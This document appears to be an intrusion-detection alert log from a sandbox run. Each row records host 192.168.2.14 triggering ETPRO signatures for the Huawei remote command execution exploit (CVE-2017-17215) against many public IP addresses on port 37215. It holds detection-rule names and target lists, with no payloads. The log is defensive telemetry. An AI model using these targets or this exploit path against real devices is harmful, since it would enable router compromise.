                                                    07/10/24-08:27:05.203843TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4615837215192.168.2.14220.93.108.198
                                                    07/10/24-08:27:27.142531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5739037215192.168.2.14104.125.244.255
                                                    07/10/24-08:27:22.487883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5394437215192.168.2.1441.87.229.233
                                                    07/10/24-08:27:32.489604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4906837215192.168.2.14113.24.217.218
                                                    07/10/24-08:27:05.156197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5684637215192.168.2.1441.240.250.216
                                                    07/10/24-08:27:22.918305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4199637215192.168.2.14157.253.136.243
                                                    07/10/24-08:27:10.751291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3649637215192.168.2.14157.190.16.179
                                                    07/10/24-08:27:08.451295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5483237215192.168.2.14157.157.243.191
                                                    07/10/24-08:27:13.921324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4511437215192.168.2.14157.195.136.112
                                                    07/10/24-08:26:55.302858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4303237215192.168.2.14165.195.135.86
                                                    07/10/24-08:27:31.559678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3510837215192.168.2.14186.84.147.1
                                                    07/10/24-08:27:13.835787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4988837215192.168.2.1441.196.23.58
                                                    07/10/24-08:27:33.852238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3403037215192.168.2.14197.237.18.124
                                                    07/10/24-08:26:38.641903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4748437215192.168.2.1441.192.0.19
                                                    07/10/24-08:26:55.296464TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5025037215192.168.2.1469.205.82.65
                                                    07/10/24-08:26:26.528508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5005837215192.168.2.1470.162.35.97
                                                    07/10/24-08:27:13.879424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4409237215192.168.2.14157.34.12.97
                                                    07/10/24-08:27:03.009589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3348837215192.168.2.14221.57.38.189
                                                    07/10/24-08:27:05.226106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4949437215192.168.2.14157.151.230.187
                                                    07/10/24-08:27:08.411856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5481837215192.168.2.14157.10.74.142
                                                    07/10/24-08:27:13.971781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3654037215192.168.2.1441.73.152.242
                                                    07/10/24-08:26:34.252438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4773437215192.168.2.14197.164.235.226
                                                    07/10/24-08:26:45.648834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4891637215192.168.2.14130.101.65.127
                                                    07/10/24-08:26:52.022282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5863037215192.168.2.14197.150.95.41
                                                    07/10/24-08:27:02.869680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5257237215192.168.2.14197.81.181.97
                                                    07/10/24-08:26:43.613127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3860237215192.168.2.14157.136.23.9
                                                    07/10/24-08:27:30.423823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4519837215192.168.2.14197.163.146.192
                                                    07/10/24-08:27:22.756681TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5697637215192.168.2.14103.188.41.51
                                                    07/10/24-08:26:22.216142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4966237215192.168.2.14157.78.109.212
                                                    07/10/24-08:26:33.256885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5970237215192.168.2.14197.228.158.216
                                                    07/10/24-08:26:38.616347TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3373637215192.168.2.14157.229.45.118
                                                    07/10/24-08:27:14.893689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4431637215192.168.2.14188.194.118.153
                                                    07/10/24-08:27:13.974355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4574837215192.168.2.14197.217.218.192
                                                    07/10/24-08:27:02.898852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3336237215192.168.2.14197.30.247.157
                                                    07/10/24-08:27:19.343381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5335837215192.168.2.14197.193.240.235
                                                    07/10/24-08:27:33.890908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4672037215192.168.2.14197.65.87.3
                                                    07/10/24-08:26:23.355278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432837215192.168.2.14116.125.115.146
                                                    07/10/24-08:27:03.013540TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5113237215192.168.2.1472.138.147.243
                                                    07/10/24-08:27:14.847892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3912237215192.168.2.14197.109.43.157
                                                    07/10/24-08:26:23.328619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6072037215192.168.2.14197.221.236.114
                                                    07/10/24-08:26:57.513977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4349237215192.168.2.1441.41.2.157
                                                    07/10/24-08:27:30.407360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3849437215192.168.2.1441.23.236.142
                                                    07/10/24-08:26:38.630697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5833237215192.168.2.14157.250.70.160
                                                    07/10/24-08:26:45.633588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4742037215192.168.2.14197.22.74.73
                                                    07/10/24-08:27:05.094714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5034437215192.168.2.14197.116.79.55
                                                    07/10/24-08:26:11.664680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3640837215192.168.2.14157.107.27.74
                                                    07/10/24-08:27:05.220771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6002837215192.168.2.14157.242.132.253
                                                    07/10/24-08:26:49.865409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5713037215192.168.2.1441.177.32.22
                                                    07/10/24-08:27:19.226208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3793837215192.168.2.14197.134.211.197
                                                    07/10/24-08:26:41.348022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5255837215192.168.2.1441.192.156.234
                                                    07/10/24-08:26:15.840826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4543637215192.168.2.1441.108.248.251
                                                    07/10/24-08:26:11.149844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4272837215192.168.2.14139.13.35.184
                                                    07/10/24-08:26:28.924774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4385837215192.168.2.14197.253.51.161
                                                    07/10/24-08:26:57.586021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4839437215192.168.2.14197.196.49.193
                                                    07/10/24-08:27:30.511682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4784437215192.168.2.14157.242.144.63
                                                    07/10/24-08:26:26.605487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4081237215192.168.2.14101.220.150.209
                                                    07/10/24-08:26:34.224175TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3530237215192.168.2.14134.228.33.185
                                                    07/10/24-08:26:42.459797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4263237215192.168.2.14157.38.162.132
                                                    07/10/24-08:26:59.879798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3348237215192.168.2.1474.171.33.162
                                                    07/10/24-08:27:23.881648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6095637215192.168.2.14197.42.190.141
                                                    07/10/24-08:26:31.081950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5354037215192.168.2.1471.25.91.136
                                                    07/10/24-08:27:27.092607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5353637215192.168.2.1441.205.89.161
                                                    07/10/24-08:27:02.918908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4023037215192.168.2.14157.0.52.155
                                                    07/10/24-08:27:29.338257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5838037215192.168.2.1441.255.176.159
                                                    07/10/24-08:26:15.849437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3941437215192.168.2.14197.180.25.143
                                                    07/10/24-08:26:38.605910TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5378837215192.168.2.14124.103.66.32
                                                    07/10/24-08:27:10.751291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3315237215192.168.2.14157.193.190.173
                                                    07/10/24-08:27:07.351373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3565437215192.168.2.14197.8.83.170
                                                    07/10/24-08:27:28.079794TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3346837215192.168.2.14157.92.52.193
                                                    07/10/24-08:26:17.963816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4135837215192.168.2.14157.183.26.252
                                                    07/10/24-08:27:20.471536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3359837215192.168.2.14197.204.165.200
                                                    07/10/24-08:26:52.015024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5381837215192.168.2.1441.238.159.96
                                                    07/10/24-08:26:22.269979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4863237215192.168.2.14116.105.19.76
                                                    07/10/24-08:26:43.542796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4385237215192.168.2.1441.92.136.200
                                                    07/10/24-08:26:59.761557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6013237215192.168.2.1483.237.204.77
                                                    07/10/24-08:26:43.829086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5935837215192.168.2.14197.175.145.173
                                                    07/10/24-08:27:23.911929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5354037215192.168.2.14162.154.166.218
                                                    07/10/24-08:26:59.870602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5257437215192.168.2.14157.62.221.6
                                                    07/10/24-08:26:15.867032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5668437215192.168.2.1441.34.176.150
                                                    07/10/24-08:26:43.646157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6054037215192.168.2.14157.18.210.152
                                                    07/10/24-08:27:07.290610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639637215192.168.2.1441.171.8.58
                                                    07/10/24-08:27:19.239494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4704237215192.168.2.1441.46.226.34
                                                    07/10/24-08:27:10.652052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3680437215192.168.2.14157.211.88.12
                                                    07/10/24-08:26:23.356986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5197637215192.168.2.14212.224.108.35
                                                    07/10/24-08:26:28.798195TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5785237215192.168.2.1441.80.192.25
                                                    07/10/24-08:27:13.931040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4723637215192.168.2.14157.41.94.15
                                                    07/10/24-08:26:59.848690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491837215192.168.2.1441.24.191.93
                                                    07/10/24-08:26:55.422877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3376237215192.168.2.1441.224.17.68
                                                    07/10/24-08:27:32.526840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4241037215192.168.2.14125.144.250.234
                                                    07/10/24-08:27:24.886736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5916837215192.168.2.14197.19.167.187
                                                    07/10/24-08:27:30.409560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5120437215192.168.2.14157.104.201.121
                                                    07/10/24-08:26:11.659396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3516837215192.168.2.14197.108.193.202
                                                    07/10/24-08:26:31.063157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4302637215192.168.2.14157.38.120.237
                                                    07/10/24-08:27:13.728066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4205837215192.168.2.1441.166.134.161
                                                    07/10/24-08:27:27.151172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3980237215192.168.2.14197.47.54.29
                                                    07/10/24-08:27:07.315089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3431637215192.168.2.14197.212.183.57
                                                    07/10/24-08:26:28.938388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3397237215192.168.2.14157.121.162.149
                                                    07/10/24-08:26:11.157015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3674637215192.168.2.14157.15.8.197
                                                    07/10/24-08:26:59.652707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4256837215192.168.2.1441.8.38.69
                                                    07/10/24-08:27:22.794160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3816237215192.168.2.1423.205.191.39
                                                    07/10/24-08:26:17.977677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4866237215192.168.2.1442.44.33.102
                                                    07/10/24-08:26:28.879483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5441837215192.168.2.1441.177.250.49
                                                    07/10/24-08:27:22.835988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5638837215192.168.2.14157.155.230.165
                                                    07/10/24-08:27:02.985510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5906837215192.168.2.1441.116.89.189
                                                    07/10/24-08:27:34.122449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4542237215192.168.2.14157.17.145.18
                                                    07/10/24-08:26:14.806375TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4467637215192.168.2.1441.129.178.170
                                                    07/10/24-08:26:55.436206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4577037215192.168.2.1436.223.194.247
                                                    07/10/24-08:26:59.863856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5021437215192.168.2.14157.103.54.95
                                                    07/10/24-08:27:02.731752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4832037215192.168.2.149.59.162.89
                                                    07/10/24-08:26:38.624233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5529837215192.168.2.14197.103.192.62
                                                    07/10/24-08:27:10.663912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5103837215192.168.2.14197.118.228.151
                                                    07/10/24-08:27:32.590326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3885237215192.168.2.14197.227.154.155
                                                    07/10/24-08:26:38.547817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3761637215192.168.2.1441.208.58.110
                                                    07/10/24-08:26:59.634002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4203237215192.168.2.14197.175.174.137
                                                    07/10/24-08:26:36.376968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5932437215192.168.2.14197.146.203.70
                                                    07/10/24-08:27:23.792966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5747837215192.168.2.1441.64.77.14
                                                    07/10/24-08:26:38.545437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3861637215192.168.2.14197.188.73.112
                                                    07/10/24-08:27:13.803034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3591837215192.168.2.14113.231.99.31
                                                    07/10/24-08:26:57.625074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4913837215192.168.2.1492.48.216.192
                                                    07/10/24-08:26:33.228280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3752437215192.168.2.14175.25.61.115
                                                    07/10/24-08:27:23.887861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5339637215192.168.2.1441.1.161.122
                                                    07/10/24-08:27:13.844638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3620437215192.168.2.14197.79.161.178
                                                    07/10/24-08:27:27.029252TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3395037215192.168.2.14197.77.178.206
                                                    07/10/24-08:26:45.591326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4792637215192.168.2.14197.230.248.51
                                                    07/10/24-08:27:13.848645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3526237215192.168.2.14197.214.244.240
                                                    07/10/24-08:26:25.526388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5649037215192.168.2.1495.49.65.206
                                                    07/10/24-08:26:49.901812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4661237215192.168.2.14157.17.242.116
                                                    07/10/24-08:27:19.310964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5437437215192.168.2.14197.100.188.220
                                                    07/10/24-08:26:14.759956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5317637215192.168.2.14157.151.198.212
                                                    07/10/24-08:26:34.234133TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6054637215192.168.2.1441.69.85.164
                                                    07/10/24-08:27:30.542154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4118037215192.168.2.14197.161.49.136
                                                    07/10/24-08:26:23.360287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4730037215192.168.2.14197.186.218.255
                                                    07/10/24-08:27:33.862299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5431237215192.168.2.14197.147.106.134
                                                    07/10/24-08:26:13.646644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4956637215192.168.2.14197.67.117.245
                                                    07/10/24-08:27:08.426882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3984637215192.168.2.14197.194.6.0
                                                    07/10/24-08:26:15.859718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4033637215192.168.2.14157.249.79.50
                                                    07/10/24-08:27:08.399018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4838637215192.168.2.1441.7.75.145
                                                    07/10/24-08:26:59.528583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4786437215192.168.2.14157.17.165.147
                                                    07/10/24-08:27:11.550512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4010637215192.168.2.14197.28.145.112
                                                    07/10/24-08:26:42.385136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4942437215192.168.2.14157.122.27.109
                                                    07/10/24-08:27:28.088837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4111037215192.168.2.14197.48.103.154
                                                    07/10/24-08:27:30.522547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5024437215192.168.2.14157.3.234.37
                                                    07/10/24-08:27:02.686169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4543637215192.168.2.1441.201.247.127
                                                    07/10/24-08:27:14.793523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5474237215192.168.2.14157.200.143.145
                                                    07/10/24-08:26:11.129630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4249037215192.168.2.14157.203.62.242
                                                    07/10/24-08:26:20.123925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4901037215192.168.2.14197.178.36.16
                                                    07/10/24-08:26:43.782105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5019637215192.168.2.1441.60.148.72
                                                    07/10/24-08:27:03.019340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4571837215192.168.2.14202.251.232.34
                                                    07/10/24-08:27:13.868751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5057037215192.168.2.14197.159.169.231
                                                    07/10/24-08:26:57.623346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5999037215192.168.2.14217.39.31.231
                                                    07/10/24-08:27:24.932186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4770237215192.168.2.14197.118.15.58
                                                    07/10/24-08:26:59.657452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4898437215192.168.2.14197.77.119.55
                                                    07/10/24-08:26:14.813637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4574237215192.168.2.1441.152.215.8
                                                    07/10/24-08:26:28.915046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5110037215192.168.2.14126.48.65.236
                                                    07/10/24-08:26:43.932018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5210437215192.168.2.14157.145.228.238
                                                    07/10/24-08:26:47.819008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4722237215192.168.2.14197.133.10.181
                                                    07/10/24-08:26:23.358336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3484237215192.168.2.14197.135.94.96
                                                    07/10/24-08:27:08.454232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4870437215192.168.2.14197.110.83.144
                                                    07/10/24-08:27:28.156684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3514437215192.168.2.1441.218.45.59
                                                    07/10/24-08:27:22.859417TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4762837215192.168.2.14157.94.202.190
                                                    07/10/24-08:27:07.281440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3445837215192.168.2.1446.152.236.244
                                                    07/10/24-08:26:28.924774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4940637215192.168.2.14157.5.252.130
                                                    07/10/24-08:27:07.335477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4356237215192.168.2.1434.94.237.195
                                                    07/10/24-08:26:59.683410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5635837215192.168.2.14190.27.199.39
                                                    07/10/24-08:27:02.868387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5148637215192.168.2.1441.57.230.87
                                                    07/10/24-08:27:30.458170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5132837215192.168.2.14197.135.76.32
                                                    07/10/24-08:26:25.473474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5678237215192.168.2.1441.53.229.245
                                                    07/10/24-08:26:51.932458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4114237215192.168.2.14157.216.133.206
                                                    07/10/24-08:27:07.281548TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4231837215192.168.2.14197.202.207.174
                                                    07/10/24-08:27:22.791681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4588637215192.168.2.14157.233.213.139
                                                    07/10/24-08:26:47.933430TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3719437215192.168.2.14157.59.4.155
                                                    07/10/24-08:26:57.521887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4453837215192.168.2.14138.32.139.52
                                                    07/10/24-08:26:59.534409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3679837215192.168.2.14157.92.248.108
                                                    07/10/24-08:27:17.019850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3883637215192.168.2.1441.144.116.144
                                                    07/10/24-08:26:20.150804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4091437215192.168.2.14174.55.72.179
                                                    07/10/24-08:26:28.879483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5912837215192.168.2.14157.171.66.154
                                                    07/10/24-08:26:13.787067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4024037215192.168.2.14180.134.121.249
                                                    07/10/24-08:26:13.741035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5434237215192.168.2.14157.16.75.176
                                                    07/10/24-08:26:49.762631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3601437215192.168.2.14197.10.9.91
                                                    07/10/24-08:27:24.981965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4694437215192.168.2.1441.91.234.254
                                                    07/10/24-08:26:13.828084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3299037215192.168.2.1458.255.75.233
                                                    07/10/24-08:26:25.411489TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4898437215192.168.2.1463.137.250.76
                                                    07/10/24-08:26:28.920818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5820837215192.168.2.14157.226.129.197
                                                    07/10/24-08:26:38.632510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5663437215192.168.2.14197.206.40.58
                                                    07/10/24-08:27:30.522162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5626237215192.168.2.1441.245.237.91
                                                    07/10/24-08:26:55.408292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5568237215192.168.2.1432.42.134.167
